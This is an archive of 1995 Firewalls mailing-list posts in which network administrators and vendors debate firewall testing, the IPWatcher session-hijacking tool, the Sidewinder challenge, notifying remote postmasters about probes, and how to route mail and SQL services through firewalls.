Probably the only easy way to prevent something like this is to use IP level encryption. Something smart like public/private key exchange or SKIP.

> Also are there other Hacker tools that can do this.

For sure.
- Oliver

From firewalls-owner Wed Aug 2 07:35:17 1995
From: Doug Hughes
Date: Wed, 2 Aug 1995 08:32:16 -0500
Subject: differences in perspective - Re: Someone knocking at our door...
To: firewalls@greatcircle.com
In-Reply-To: <9506318072.AA807210209@moraine.cc.il.us>

I think the whole thread on whether to notify the postmaster or not is based upon your assumptions, and the organization the attack is coming from. In the past I have found the postmasters of notified sites to be helpful, courteous, and grateful for the notification. However, most of the sites we get probed from are other academic sites. I think there would be a major difference if a prolonged attack were launched from a major corporation, or overseas. In that case, the motives would be unknown. In the case of a university, the culprit is usually some undergrad trying to apply his latest knowledge from alt.2600 or #hack to some place. In this case I think it is appropriate to notify the postmaster at the site to nip the behavior in the bud. (The postmaster can then identify and communicate with the user, if possible, and discourage him from a "life of crime" ;) )

Q: Should you notify the postmaster at a remote site?
A: it depends on circumstances
1) is it an educational institution? - probably yes
2) is it an independent service provider like netcom? - probably yes
3) is it a major corporation? - possibly yes
4) #3 with attack coming from multiple machines? - possibly no
5) overseas? - probably no, but possibly yes
6) a known "den of thieves" hack site? - definitely no
etc..

-- 
____________________________________________________________________________
Doug Hughes                              Engineering Network Services
System/Net Admin                         Auburn University
doug@eng.auburn.edu
"Real programmers use cat > file.as"

From firewalls-owner Wed Aug 2 08:05:01 1995
Date: Wed, 2 Aug 95 10:28:40 -0400
Message-Id: <9508021428.AA16907@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: IPWatcher

Andrew writes:

>I have come across a package on Internet called IPWatcher. This
>package renders firewalls and smart cards useless in that it allows
>the person using it to hijack and take over an established connection.

This is why I have been blathering for some time that if the link needs good authentication, then the entire link needs to be encrypted. Now just having IPWatcher will not be enough, you must also be in the right location. Still, how do you *know* someone isn't?
Back before the flood (well 1992 or so) ISPNews printed an observation of mine that OTP devices would make excellent protected seeds for link encryption and by the fact that you could communicate at all, both ends were authenticated. Then the gov shoved its foot in & it was never developed. Maybe its time has come.

Warmly,
Padgett

ps Erin is now somewhere to the west and other than needing to re-caulk the cricket over the garage and the loss of a few tomato plants, all is well.

From firewalls-owner Wed Aug 2 08:07:43 1995
From: "Robertson, Paul"
To: firewalls@greatcircle.com, firewalls-owner@GreatCircle.COM
Subject: the ongoing debate..
Date: Wed, 02 Aug 95 10:16:00 PDT
Message-ID: <301FB32F@msgate.gannett.com>

Marcus said:

> On my machine here (switchblade.iwi.com) I'm not running
>any security and it's *GREAT*! I'm not even behind a firewall! I
>refuse to firewall off my own home. :) *BUT* my business papers
>and processing are all done on a different machine and the only
>thing you can steal from my server here is a bunch of source code
>I've mostly posted to the 'net years ago. I believe that is the
>*TYPICAL* Internet connection and I believe this is a perfectly
>good approach. It doesn't scale real well, though.
The problem with this model is that, unfortunately, users who are *used* to this approach don't seem to understand that once their machine is connected to a business network, what was a 'perfectly good approach' becomes a potential network vulnerability. Also, I would imagine that the average user doesn't have multiple machines with which to play.

> If my machine were the launch console for H-bombs I'd
>strip it to a point of beyond uselessness, to secure it! :)

Or, if you were the typical user, you'd just download launch-hbomb-winsock.zip

> The point here is that the solutions need to
>match the problems. IF people who buy their computing solutions do it with
>that in mind (they don't!) it's not too bad - you buy an ordinary
>box for ordinary purposes and a CompaqLaunchPro for your H-bomb
>console and suit the engine to the task. Most people use pliers
>to drive nails, too; I know I've done it in the past.

Doesn't this then imply that the solutions need to match the people as much as, if not more than, the problems? Hammers are quite common, Torx[tm?] screwdrivers aren't. When the user keeps coming up against a Torx screw, he'll keep reaching for the pliers.

>can get their work done. At one customer site, we started engineering a
>firewall and they wanted to make *SURE* (in the sense of assurance)
>that Web-based viruses could not get in. Suddenly, all the solutions
>become complex, draconian, expensive -- and WORST OF ALL - you can't
>use the Netscape browser anymore.

Not sure that that's a bad thing [No ] :). This has always been the problem with information security. Until the Enigma, devising ciphers that were secure enough to be useful, but easy enough for an agent in the field to use was the issue.

> My take is that the ACSG have been too "hard core" and
>basically called for "if it's not perfect, don't do it" which
>caused the market to say, "ok." and go someplace else.

I totally agree.
Also, most infosec people have the same mindset, it must be gubbermint brainwashing at work :)

> There's just no way, with computers, to build in the
>invisible redundancy that you can in a bridge.

Or maybe there is?

>*THAT* is my challenge to the ACSG: make the security an invisible
>part of the infrastructure, like an engineer can when building a
>house.

What? And put us all out of business?

> I can think of a number of really crude responses I'd
>love to make here. :) I know several people who like to be forced
>to do painful, humiliating, or just plain uncomfortable things.
>But even the masochists I know couldn't eroticize using a B2 system.

I'll skip the obvious temptation to launch into alt.erotica.tsec.systems.b2 :)

>>in X code that said "hey, I know this is ugly, but I'm a graduate student
>>and I don't have to care." True or not, it makes the point that building

I just couldn't snip this, it's priceless.

> A number of times I have talked to folks who really should
>not be on the 'net. I've listened to their firewall requirements,
>reviewed their designs, and recommended that they cancel the T1,
>and buy everyone at the facility an account on AOL, a modem at
>home, and an extended work policy that lets them spend an hour a
>day at home Internetworking.

Did anyone take this approach? I'm *really* interested in that answer.

> Whenever I hear someone say the kind of thing you're
>saying in the paragraph above, I know I am talking with
>someone who has never had to put a product out under deadline,
>on 4 different platforms, next week, for customers who want
>to pay half what you're charging for it.

Half? You musta been selling to the Government!

> I hate to break it to you, but a lot of commercial code
>is complete, unmitigated crap, too. You just don't get to see
>it because it's proprietary. Look at Windows internals and then

Actually, probably most of it.
I'd hazard to guess that 80% of commercial programmers write sloppy code, and I'd probably be under the mark. I bet you could get hundreds of volumes of "At the last company I worked for as a developer....." stories. Good programmers write good code, the guys doing it for fun don't have deadlines, so sometimes they're less constrained that way. On the other hand, they may not have peer review (Linux, *BSD, et al. excluded).

> "an answer" that is not "the best answer" is going to be
>a commercial failure. It may be "the right thing" in some people's

Actually, that's not true, marketing can make the worst answer profitable.

>work. There's a tunnel driver for UNIX (Jeff Onions') that sets
>up a virtual network interface. All packets routing to the interface
>appear in /dev/tun0 for read. You simply read each packet at an
>application level, uuencode, and mail. On the other end, you reverse
>the process. It requires a collaborator.

I don't suppose you have a URL? This could make for some interesting demonstrations at work :)

-- 
Paul D. Robertson                   The above text is the author's opinion,
proberts@moc1.gannett.com           which may have no basis whatsoever in fact.
PSB#9280

From firewalls-owner Wed Aug 2 08:36:04 1995
Date: Wed, 2 Aug 1995 11:00:43 -0400
From: rmck@sandfiddler.paragon-systems.com (Bob McKisson)
Message-Id: <9508021500.AA00397@sandfiddler.paragon-systems.com>
To: firewalls@greatcircle.com, ian@oms.co.za
Subject: Re: NetSp wins Trust Award

> > The following information was forwarded to me by pro-IBM guy. I'd appreciate
> > comments from the list on both NetSP and the relevance of the announcement.

snip

> > --------
> > SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility
> > (RACF) and NetSP Secured Logon Coordinator were recently named as
> > winners in two categories of the InfoSecurity News Readers' Trust
> > Awards.
> >
> > The magazine's readers selected NetSP as the best network security
> > product and RACF as the best platform security product in the awards
> > announced in the May/June issue. Readers were asked to choose which
> > product in each of 16 categories they trust the most.
> >
> > "These awards represent the opinions of information-security
> > professionals who use these products in real-life situations," said
> > Michael I.
> > Sobol, InfoSecurity News publisher. "Our 28,000 readers
> > know more about the technology and the products than anyone. These are
> > the first awards to give the real experts in information security--our
> > readers--a chance to name their favorite products."

Hummmmmm. With all due respect to Mr. Sobol, the first thing to keep in mind when reading any of this stuff is to realize that this was put out by a media publication whose purpose for being is to generate revenue through the sale of paper and words. Whether or not the information is relevant, useful or accurate is a totally separate issue. The only time that accuracy of information and the generation of revenue "can be" linked in a trustworthy manner is by your CPA.

rmck

From firewalls-owner Wed Aug 2 08:59:51 1995
Date: Wed, 2 Aug 95 10:50:15 EDT
From: Marcus J Ranum
Message-Id: <9508021450.AA05935@tis.com>
To: firewalls@greatcircle.com
Subject: connectathon: BOGUS // testing methodologies

I'm not sure the idea of a firewall connectathon is especially good. Sure, it'd help the reputations of all the consultants who'd swarm all over the thing, but would it actually help the customer? In the case of NFS, connectivity and interoperability are the main concern, so it makes sense.
In a firewall, we pretty much can assume that they'll talk to each other (somehow) -- the question is one of security. Many of the responses to the sidewinder challenge (mine among them) have pointed out that a "take a crack at it!" penetration testing methodology has more marketing than technical merit. I won't repeat the arguments other than to point out that a firewall connectathon would just be a *LOT* of useless, blind, penetration tests taking place at once. How dramatic. How silly.

Even though I may be perceived sometimes as holding negative views about formal security methodologies, one thing they have got ABSOLUTELY right is that security comes from a sound design. A firewall "designathon" in which the vendors debated why their design philosophy is better - now *that* would be interesting and useful.

I've been really upset recently by a trend I'm seeing in firewalls, where unscrupulous consultants and "firewall experts" do "penetration tests" on firewalls for large amounts of money. Basically, they run SATAN against it, wave a dead chicken over it, and announce they found nothing. This is a completely bogus approach and does not benefit the customer at all. There *IS* a use for firewall installation testing/verification, but it depends on:

1) Understanding the design of the firewall
2) Understanding the installation assumptions of the firewall
3) Seeing that the implementation of the firewall matches the design. This entails developing hypotheses based on the design, as to how it might fail if the implementation was different from the specification
4) Seeing if the firewall is installed correctly on the customer's network

#4 is important. I've run across one case where a firewall was installed *WRONG* so that traffic could route around it!! Someone who "tested" it using the simple approach might decide it was secure because they'd never think to set up some special routes in their test machine.
The reason that the SATAN+wave-a-chicken approach is popular is because the consultant can invest minimal prep time, and doesn't have to actually learn anything about the product other than that it's a black box. Some of the big body-shop consulting firms are gearing up to become "official firewall testers" and their methodologies appear to be mostly in the SATAN+chicken mode. A connectathon will simply invite a large amount of such bogusness to happen over a short time in a small place.

mjr.

From firewalls-owner Wed Aug 2 09:45:10 1995
From: dan thomsen
Date: Wed, 2 Aug 1995 10:05:55 -0500
To: firewalls@greatcircle.com
Subject: Sidewinder Challenge
Message-Id: <199508021505.KAA05301@ender.sctc.com>

For the record

The reward for completing the Sidewinder Challenge has not changed! Someone erroneously posted a message saying that the reward for completing the challenge at DEFCON was $5000. The reward still remains a black nylon flight jacket with the Sidewinder logo on it.
In response to some of the discussion this has generated I thought I would answer a few of the concerns that have been raised.

CONCERN 1. Setting up a challenge site does not provide sufficient testing.

All a challenge site does is test how good the attackers are. We do NOT test the Sidewinder system by setting up a challenge site. We have a Systems test group that does systems testing. They work independently from the developers to test the functionality and security of the system.

CONCERN 2. What good is the challenge, because it is not set up like a firewall.

[Note, for those not familiar with the Sidewinder challenge, we let you login to the Challenge system and from there you have to get to a machine on the internal network. The DEFCON challenge is going to be more difficult and set up more like a firewall]

The Secure Computing Sidewinder challenge focuses on testing the type enforcement technology, not the firewall capability. Type enforcement is what we use to protect sensitive data, applications, and network interfaces in the firewall product.

Why do we focus on type enforcement? First off we want people to look at the system. If it was set up like a firewall only the successful people see inside the system. A firewall challenge is more difficult and attackers would lose interest quickly. Believe it or not we wanted to give the hackers a chance to break into the system. The standard Sidewinder firewall product was modified to produce a Sidewinder challenge system that gives the hackers three key advantages:

- A login account on the firewall (demo with no password)
  Normally users do not have accounts on Sidewinder.
- Four access violations before they are logged out
  On the Sidewinder firewall one violation causes a user to be logged out.
- Loose Unix administration
  Rather than remove every piece of software on the system and tighten security so hackers have nothing to work with, we left many Unix programs on the challenge system, including a compiler.
On the Sidewinder firewall programs that are not needed are removed.

People can get inside the challenge system and look around. We have had approximately 10 people get 'root' access. Since type enforcement is underneath the Unix permissions it doesn't do them any good. The attacker is still constrained by the underlying type enforcement constraints. As a result we get to learn what kind of attacks people are using against Unix systems. More importantly this shows that type enforcement is a useful tool in preventing system compromises.

The biggest reason to create a challenge site that is different from the Sidewinder firewall product is to protect our customers. If there ever was a successful attack found on the Sidewinder challenge site it could not be used directly on the Sidewinder firewall. The challenge site is currently based on a pre 1.0 release of Sidewinder. Currently we are shipping 2.0 systems, and upgrading all our customers to 2.0 systems. We monitor the challenge site every day and if someone finds a vulnerability we can respond immediately by closing the vulnerability and notifying all our customers.

The DEFCON firewall challenge is more difficult than the Sidewinder Challenge. While it looks more like the Sidewinder firewall product we are only running the DEFCON challenge for a short period of time, and it will be closely monitored.

CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic?

The answer is both. We learn about attacks on the Unix operating system. People who login to the challenge site learn about type enforcement. If you are considering buying a firewall system what better way to evaluate it than to login and kick the virtual tires.
Dan Thomsen
Secure Computing
thomsen@sctc.com

From firewalls-owner Wed Aug 2 09:53:06 1995
From: Søren Døssing DR-EDB
Date: Wed, 02 Aug 95 17:55:00 PDT
To: "'firewalls@greatcircle.com'"
Subject: HP9000 firewalls
Message-ID: <30201EF7@smtpgw.dr.dk>

As I promised, here is a resume of firewalls for HP9000 computers.
TIS Firewall Toolkit  -  Trusted Information Systems  -  http://www.tis.com
HP-UX Gauntlet        -  Trusted Information Systems  -  http://www.tis.com
Eagle                 -  Raptor                       -  http://www.raptor.com/
Firewall-1            -  Checkpoint                   -  http://www.checkpoint.com

From firewalls-owner Wed Aug 2 10:26:52 1995
From: Scott Barman
Date: Wed, 2 Aug 1995 11:18:25 -0400 (EDT)
To: Phil Trubey
Cc: firewalls@greatcircle.com
Subject: Re: Microsoft SQL Server on NT through firewall?

On Tue, 1 Aug 1995, Phil Trubey wrote:

> I know there has been some discussion here about Oracle's SQL*Net and how
> one would go about providing access to such a server through a firewall.
>
> Does anyone know if this is possible with Microsoft's SQL Server running on
> an NT machine? The Internet based client application will be using either
> dblib or ODBC calls to the network layer to access a server which will be
> on the protected side of the firewall.
>
> Does anyone know if MS SQL Server uses a static TCP port number for its
> server? Is any data including passwords encrypted?

And since M$'s SQL server is based on Sybase's (keeping with the theme), does anyone know how to tunnel these through a firewall? I just found out (last night) that I may have to do this so I am interested in any and all information!

THANKS!

scott barman

--
scott barman            DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com    and I speak only for myself.
barman@ix.netcom.com

"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."

From firewalls-owner Wed Aug 2 10:32:28 1995
From: Danny Cox
Date: Wed, 2 Aug 1995 16:15:49 +0100
To: firewalls@greatcircle.com
Subject: an alternative for our email
Message-Id: <3168.9508021515@gmap.leeds.ac.uk>

Dear all,

we have our email working nicely currently, coming in and out. I still need to set up smapd or some such to wrap around sendmail however, but that's another story.

A complication in our particular setup is the existence of a fair sized network of PCs, which run Netware (3.1 I think) and WfWg. The mailtool used on those is cc:Mail. What I was hoping to achieve was to use the cc:Mail to view the mail which would be stored on a Solaris mail server somewhere. The mail is already set up for the Sun network just fine. Seemingly cc:Mail doesn't talk SMTP directly; we need a gateway of some sort. That doesn't feel brilliant to me, as it seems that we'd end up with mail files distributed in different places, and have more than one email address per user (I think?).
Another option is to run Solaris cc:Mail and have that connecting to the cc:Mail post office, and then the cc:Mail/SMTP gateway connecting to the outside world. I have mixed feelings about this; all this is behind a firewall, and I have a nasty feeling I could end up out of control somewhere.

Anyone any experience of doing this sort of thing, or got any comments ?

              ______________ internet _________________
                                 |
                          ----------------
                          |   firewall   |
                          ----------------
                                 |
          ----------------                  ----------------------
          |   cc:Mail    |------------------| cc:Mail Post Office |
          | SMTP gateway |                  ----------------------
          ----------------                            |
                 |                                    |
               Suns                          PCs (cc:Mail clients)

thanks in advance

Danny

From firewalls-owner Wed Aug 2 10:53:09 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Wed, 2 Aug 95 11:37:22 -0400
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: Using multilevel systems...
Message-Id: <9508021537.AA17110@uvs1.orl.mmc.com>

Ted rites:

>Now we're all "Thriving On Chaos", driving information down to the user's
>desktop. Heck, I'm writing this using Linux. Forget Windows 95, I get this
>for *free*. Remember the old saying: "Old VAXes never die, they just get
>clustered"? The new one is "Old 486s never die, they just become bitchin
>workstations with Linux/GNU/X/MUDs/etc."

All this means is that we need distributed systems.
Things which we make available to the public need to be separated from that which is to be kept private. A or B. Not difficult at all.

>Management understanding of these issues is way behind. The obvious problem
>is Phyber Optik hacking in from the `net and looking thru the Personnel
>files. The less obvious problem is insuring the integrity (much less often,
>the privacy) of corporate data, from all threats.

I think most management understands that there is a problem. The bigger issue is that many managers feel that they know what to do about it. Think it was Will Rogers that said "It isn't what people don't know that is the problem, it's what they know that just isn't so."

Managers, particularly middle managers in big corporations, seem to feel that to admit there is something they do not know is inadmissible. Even worse are experts (LAN experts in particular) operating out of their field. Curiously, top management, if you can ever get through to them, are usually not a problem - guess they do not feel threatened.

>Note that hackers should fall into one of these categories, and firewalls
>only protect against a certain, very well bounded class of these risks.
>(a quick note: the mainframe guys DO think about this; it's the UNIX/DOS
>world that doesn't.)

Just finished reviewing an audit document that made much of "viruses" and "virus scanning". Popular buzzwords and an indication that the writer really does not understand the bigger problem. It is an indication that this is widespread that scanners are still so popular. My software hasn't a clue what a virus is but addresses the larger problem of viruses and worms and trojans and logic bombs. Once it is installed, most people never even know it is there unless something goes rong. Of course that is my concept of good security - you never need to know it is there unless something happens.
>I think that maybe the issue shouldn't be phrased as "Bad old Management
>doesn't understand Internet Security and Firewalls" (they don't; get over
>it). Rather, we need to start learning corporate-speak concerning data
>integrity issues. Once this happens, we'll probably see some pretty
>decent progress.

Have taken graduate level courses in finance for that reason. Problem has always been middle management, not top, and being able to talk intelligently about future values and sunk costs does not help there. Seems you must get through the "glass ceiling" first and engineers just do not do that.

Warmly,
Padgett

From firewalls-owner Wed Aug 2 11:04:08 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Wed, 2 Aug 95 10:39:31 -0400
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: re: multilevel etc. (curse branedead VaxMail)
Message-Id: <9508021439.AA16948@uvs1.orl.mmc.com>

JGT rites (and >> Ray):

>I can't even think about it. It is tough enough getting everyone
>to setup and run their DNS and email configurations correctly.
>Multi-level network??? The cost of setting it up, let alone
>maintaining it, let alone getting management to buy into it
>is inconceivable.

Not at all difficult when you remove the classical "single CISC O/S based host does everything" for an array of single purpose dumb machines. Divide and conquer.
>> This is indeed the classical view of distributed system security:
>> 1) All data is important to some degree or another
>> 2) All data should be separated from all other data
>>    to some degree or another
>> 3) Most organizations don't separate their data at all
>> Conclusion: therefore they are wrong
>> Corollary: therefore they should use multilevel systems

Here is where I was making the separation between "bilevel" and "multilevel" systems: bilevel is essentially "system high" - all people/nodes/processes within the group have the same access level and all information is treated equally. Why get hung up on multiple levels of protection within a single entity when you can just separate the differing levels ?

Came to the conclusion a looong time ago that it is easier to protect *everything* than just some things. Also makes management decisions easier (long about 1989 we had a policy that mandated protection of "Critical Electronic Information" - as typical in my career, the most valuable contribution I made was to remove the word "Critical").

>Conclusion: Most organizations accept the risk of data compromise
>            or destruction as an acceptable cost. A cost that is
>            far below the cost of implementing the 'correct'
>            protections.

Only organization that can say that is one that does not have much to lose. There are several multimillion dollar programs (multi-hundred-million dollar programs !) that I strongly suspect (don't ask) were lost due to electronic bidding leaks.

> "Meeting the spec" is the real reason multilevel systems won't
> take off. It's too late.

Security does not have to be difficult provided it is on choke points. Individual nodes/workstations are not choke points. Take my lawn sprinklers (please 8*): I do not have a valve on each head, I have distribution valves at a single point that control the flow to each subsection. Control is via $5 K-mart appliance timers (4).
Now for a whole lot more money/complexity I could have purchased a single valve/multi-point timer and would have to replace the whole thing if something goes rong (have spent about $40 in maintenance over ten years. SDPS model was three times that). True, the lower cost was offset by somewhat more planning/work to install up front but is much simpler and not having microprocessors survives here in the "lightning capital of the USA".

>I think you are overstating the case. It may be there are more DOS or
>Apple Macs out there that haven't a clue, but you must also consider that
>all those users of those machines are also very likely to have an account
>on a unix, vm, mvs or other system that does have the concept. You are
>correct that integrating those 'D' systems into more secure systems is
>a daunting task.

Not at all difficult for "system high".

>Yup. Security comes in 3rd or 4th after function, performance, and
>other 'more important' issues.

Have demonstrated that good security can *improve* performance by eliminating spurious packets and reducing non-productive efforts.

>Amen! It is a people EDUCATION problem. Until the people involved
>understand the risks, real or imagined, to the current process and the
>bottom line monetary cost and benefit NOTHING is going to happen.
>Even when they do understand, a decision may be made to do the 'wrong'
>thing.

Really it is a *management* education decision that they need to hire/develop some individual to "protect the Enterprise", give him/her/it/other the authority/funding to do so, and let it happen. Too often things go rong because unqualified people make idiotic decisions. Even worse, people who know better accept them. Of course the late recession makes it difficult for good people to Vote With Their Feet.

Point is that electronic security is a complex and dynamic field. To be implemented properly requires an expert in a narrow field. Keeping up is a full time job in itself.
Managers are hired to manage, not to be security experts. The sooner they realize that, the better.

Warmly,
Padgett

From firewalls-owner Wed Aug 2 11:12:08 1995
From: David Kovar
Date: Wed, 2 Aug 1995 13:10:29 -0400 (EDT)
To: firewalls@greatcircle.com
Subject: Firewall testing lab?
Message-Id: <199508021710.NAA29962@nda.nda.com>
In-Reply-To: <9508021450.AA05935@tis.com> from "Marcus J Ranum" at Aug 2, 95 10:50:15 am

This discussion about a connect-a-thon reawakened my interest in a project I've been meaning to put together for awhile, a true firewall testing lab. This would essentially duplicate what Scott Bradner at Harvard did for routers a few years back. Off the top of my head, it would require:

* A test suite would be developed for use with all systems.
* A common hardware platform would be chosen.
* A fixed network would be constructed, consisting of several "internal" hosts running common, and not so common, services along with several external machines.
* A checklist would be developed for reporting the performance and service characteristics in a uniform fashion.
* A summary report.

I'd envision one massive test to cover the existing products and then quarterly reviews and new tests to cover updates and new products.
What I lack, at the moment, is the hardware and the space to house the test lab. I suspect I can secure the hardware without too much difficulty. Anyone in the SF Bay area have any space they can contribute to this effort?

If anyone is seriously interested in contributing to such a project, please let me know. I think it would be beneficial to the firewall community if done properly. "Done properly" is crucial. Level playing field, no (or few) egos and self serving efforts, and as unbiased as possible.

-David

From firewalls-owner Wed Aug 2 11:39:56 1995
From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks)
Date: Wed, 2 Aug 95 11:19:35 PDT
To: craiga@Ipsilon.COM
Cc: firewalls@GreatCircle.COM
Subject: FireWall Connectathon
Message-Id: <9508021819.AA15663@olympics.Eng.Sun.COM>

Craig,

I'd add a rule of the form: Configuration *must* be in use/production somewhere. It would be too easy to build a host that didn't do much of anything, and didn't pass squat, and thus didn't show any holes.

I commend the effort, but would want this to be a realistic testing of *real* firewalls. Otherwise we end up with 10 vendors with air-tight configs that wouldn't be useful as anything except boat anchors.

my U.S.
$0.02

Brad

From firewalls-owner Wed Aug 2 12:05:21 1995
From: peter@nmti.com (Peter da Silva)
Date: Wed, 2 Aug 1995 12:18:10 -0500 (CDT)
To: mjr@iwi.com (Marcus J Ranum)
Cc: firewalls@GreatCircle.COM
Subject: Re: connectathon: BOGUS // testing methodologies
Message-Id: <9508021718.AA09752@sonic.nmti.com.nmti.com>
In-Reply-To: <9508021450.AA05935@tis.com> from "Marcus J Ranum" at Aug 2, 95 10:50:15 am

> In the case of NFS, connectivity and interoperability are the
> main concern, so it makes sense. In a firewall, we pretty much can assume
> that they'll talk to each other (somehow) -- the question is one of security.

I've run into cases where our firewall has prevented us from getting through their firewall. Mostly along the lines of "how do I tell the ftp proxy to select a different port"...
From firewalls-owner Wed Aug 2 12:06:03 1995
From: "Robertson, Paul"
Date: Wed, 02 Aug 95 13:16:00 PDT
To: firewalls@greatcircle.com, firewalls-owner@GreatCircle.COM
Subject: differences in perspective - Re: Someone
Message-ID: <301FDD22@msgate.gannett.com>

>From: Doug Hughes
>Q: Should you notify the postmaster at a remote site?
>A: it depends on circumstances
> 1) is it an educational institution? - probably yes

Depends on the admin at the institution. I've heard horror stories about one university that after hearing their root passwords were on a provider, said "Oh well, stuff happens". By contrast, I've been very pleased with the .edu sites I've had to contact.

> 2) is it an independent service provider like netcom? - probably yes
> 3) is it a major corporation? - possibly yes

I'd change this to definitely yes. I know *I'd* want to know if one of my users was playing around, because if he/she/it's doing it to you, they could be doing it to me too.

> 4) #3 with attack coming from multiple machines? - possibly no

Hmmm, this seems like time to call in the higher zone contacts.

> 5) overseas? - probably no, but possibly yes

I've had good results with overseas, I think a good admin is a good admin, regardless of geography.
> 6) a known "den of thieves" hack site? - definitely no

Unless you think that they will go bother someone else, and your audit requirements make that a good thing.

> etc..

Paul.
--
Paul D. Robertson            "The opinions stated above may have no
proberts@moc1.gannett.com     basis whatsoever in reality."
PSB#9280

From firewalls-owner Wed Aug 2 12:07:30 1995
From: Mike Neuman
Date: Wed, 2 Aug 1995 11:34:15 -0500
To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com
Subject: Re: IPWatcher
Reply-To: mcn@EnGarde.com
Organization: En Garde Systems--St. Louis, MO
Message-Id: <199508021634.LAA14245@guardian.EnGarde.com>
In-Reply-To: <199508021154.EAA02220@miles.greatcircle.com>

In article <199508021154.EAA02220@miles.greatcircle.com> you write:

>IP watcher is nice and fine but it assumes you're going to be there 24hours
>a day to catch the cracker that comes knocking at 2am. I'd prefer to be
>asleep with some knowledge that my network was safe than be thinking on
>whether or not I should be there watching, waiting...

Well, IP-Watcher never claimed to be the all-encompassing network security solution. Sound network security should be built of multiple components, working together. IP-Watcher should be just one of those components (a sound firewall should be another, and a sound network security scanner yet another).
IP-Watcher was designed to respond to situations where a hacker gets past your other layers of security, and you need a way to:

1) Log, for evidence purposes, his actions
2) Determine what holes he is exploiting
3) Determine what machines he has exploited so you can direct your cleanup efforts, and get an idea of how much damage has been done
4) Monitor a suspicious user in realtime, and be able to terminate that user's connection in realtime.

Or, what about monitoring insiders? They're already past your firewall, and could be attacking machines from the inside. IP-Watcher can help defend against that threat as well. And, of course, there are many non-security uses for IP-Watcher as well...

Although many firewall vendors will claim they have the be-all end-all solution to network security, and that by putting their system in place, you can sleep easy at night and never worry about a hacker, never is that truly the case. Personally, I'd prefer to worry about whether I should be watching my network, rather than closing my eyes to the possibility. (But then again, I'm one of the authors of the program. :-) )

>I'm more concerned that businesses will buy these and turn them inwards...
>(for better or worse). Seems like a nice tool for CERT like people who want
>to watch things going on - it won't make a network more secure.

On the contrary, I think it will. Giving the administrator the power to monitor anyone, and instantly terminate their connection (and even set up filter lists to lock out the remote host/network temporarily) boosts security quite a bit. Again, it's just one piece of a bigger puzzle.
-Mike
mcn@EnGarde.com

From firewalls-owner Wed Aug 2 12:39:16 1995
From: Atkinson-K@smtpgw.nctsw.navy.mil
Date: Wed, 2 Aug 1995 13:45:58 -0400
To: firewalls@GreatCircle.com
Subject: Protecting X.400 anyone?
Message-Id: <01fb8c30@smtpgw.nctsw.navy.mil>

wbunting@ch.inri.com (Bill Bunting) wrote:

>Can anyone answer some/all of the following about X.400 in a firewalled
>environment.
>* What are the best methods to protect X.400 and X.500?
>* What is the best source of information on the WWW about X.400/X.500 and
>how it relates to firewalls?
>* Do you use a proxy for X.400, something like SMAP, or what?
>* What is the comms flow for X.400 using TCP/IP i.e. ports in use and
>protocol information? (where is this best documented [RFC ####,
>http:####] ?
>* Is there any freeware or public domain source code available to protect
>X.400/X.500?
>* Does anyone have any experience they would like to share about
>X.400/X.500?
>* If I should have to develop an X.400 proxy/protector which public
>domain implementation of X.400/X.500 (source code) is available/best?
>Thank you,
>- -Bill.
We've worked the issue of permitting X.500 access from a high net to a low net under the NSA MISSI program, but haven't dealt with the X.400 issues. If your client is in the U.S. DoD, the firewall must be DMS-compliant, which is more than just passing X.400/X.500. I've heard that a couple of vendors are pursuing DMS-compliance, but their efforts have been hampered by delays in the award of the DMS contract. Now that we're finding out what Loral will be providing for the DMS infrastructure (MTS/DS), vendors will have a better idea of what it will take to make their product DMS/MISSI-compliant.

Kenny Atkinson
NCTS Washington

From firewalls-owner Wed Aug 2 13:00:25 1995
Date: Wed, 02 Aug 95 13:35:05 EST
From: "Tu Nguyen"
Message-Id: <9507028073.AA807396448@CC.IMS.DISA.MIL>
To: firewalls@GreatCircle.COM
Subject: SW for FW Performance Test?

To all,

I would like to do the following FW performance tests:

  1. Load (large sizes and large number of sessions)
  2. Endurance (large loads for a long duration of time)

Does anyone know where I can find software to generate traffic for the tests above?
Thank you,
Tu Nguyen
DISA

From firewalls-owner Wed Aug 2 13:32:43 1995
Date: Wed, 2 Aug 1995 12:30:35 -700 (PDT)
From: Jereme Dean
To: Cameron_A_P@ceo.sbic.co.za
Cc: firewalls@Greatcircle.Com
Subject: Re: IPWatcher
In-Reply-To: <9508021235.AA00151@zork.sbic.co.za>

Well, ipwatcher is commercial, so that stops most of the public from getting it. And the same people that made ipwatcher also made a freeware ttywatcher which applies the same principles as ipwatcher, but just with tty monitoring/stealing.

On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote:

> Message:
> I have come across a package on Internet called IPWatcher. This
> package renders Firewalls and Smart Cards useless in that it allows
> the person using it to hijack and take over an established connection.
>
> The URL to get more info on this package is
> http://nad.infostructure.com/watcher.html
>
> My question and problem is how do you prevent this from happening.
> Also, are there other hacker tools that can do this?
>
> --
> Andrew Cameron
> Cameron_A_P@ceo.sbic.co.za
>
>

From firewalls-owner Wed Aug 2 13:37:55 1995
Date: Wed, 2 Aug 95 14:25 EDT
From: Wilner@DOCKMASTER.NCSC.MIL
Subject: Re: the ongoing debate..
To: firewalls@GREATCIRCLE.COM
Message-ID: <950802182538.038980@DOCKMASTER.NCSC.MIL>

Some commentary on mjr's "clarification" of "Orange Book think" and the attendant banter that has gone on for some time:

> TCSEC (trusted computing security evaluation criteria)

I thought it was the Trusted Computer System Evaluation Criteria. Perhaps this is a "trivial" criticism, but knowing the proper meaning of an acronym seems really basic to the consistency of your kerygma.

> trusted system is [a system designed with an eye toward
> the TCSEC]

